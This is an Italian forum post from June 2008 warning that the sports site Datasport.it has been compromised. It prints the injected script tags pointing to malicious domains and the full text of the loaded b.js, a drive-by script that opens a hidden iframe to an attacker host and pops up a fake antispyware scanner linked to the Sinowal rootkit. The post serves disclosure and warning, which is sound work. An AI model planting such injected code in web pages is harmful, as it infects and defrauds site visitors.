Giovedė 5 gugno 2008
Nel momento in cui scrivo il sito Datasport.it,
sezione news calcio serie A, č stato ulteriormente violato: presenti redirect ai siti:
Quote:
http://www.encode72.com/b.js
http://www.view89.com/b.js
http://www.exec51.com/b.js
http://www.sslnet72.com/b.js
http://www.sslnet72.com/b.js
http://www.sslnet72.com/b.js
http://www.win496.com/b.js
|
Tali script se non ho letto male(putroppo a lavoro non ho i mezzi adatti ad approfondire la cosa)reindirizzano a un falso antispyware e,cosa pių pericolosa,a domini in cui č hostato l'MBR Sinowal.
Ho giā provveduto a segnalare la cosa a datasport.it(ore 10:05).
Avira premium con webguard attivo non segnala nulla di anomalo riguardo lo script
Consiglio a chi utilizza Internet Explorer e l'analisi completa del sistema,idem per chi utilizza Firefox SENZA l'estensione NoScript installata e attiva.
Link all'analisi dello script su virustotal.com
Contenuto dello script su datasport.it
Quote:
<script src=http://www.view89.com/b.js></script><script src=http://www.encode72.com/b.js></script><script src=http://www.exec51.com/b.js></script><script src=http://www.sslnet72.com/b.js></script><script src=http://www.sslnet72.com/b.js></script><script src=http://www.sslnet72.com/b.js></script><script src=http://www.win496.com/b.js></script></a></span></div>
|
Contentuto dello script in oggetto:
Quote:
window.status="";
var cookieString = document.cookie;
var start = cookieString.indexOf("bannerupdate=");
if (start != -1)
{}else{
var expires = new Date();
expires.setTime(expires.getTime()+24*1*60*60*1000);
document.cookie = "bannerupdate=update;expires=" + expires.toGMTString();
try{
document.write("<iframe src=http://exec51.com/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0></iframe>");
window.open("http://www.advancedxpdefender.com/sysscan/f3dd61256dd53c3ff34e20b256b505fa/1/",'defender',"toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,width=1024,height=600,top=10,left=10");
}
catch(e)
{
};
}
|
Il tutto dopo quanto era successo Lunedė 2 giugno come potete leggere
qui ...anche questo problema segnalato in quella stessa data senza aver ottenuto uno straccio di risposta ma cosa ben pių grave senza che chi si occupa del portale non abbia provveduto a correre ai ripari nč per ripulire il codice delle varie sezioni del portale nč per eliminare eventuali falle nei software utilizzati
Seguiranno aggiornamenti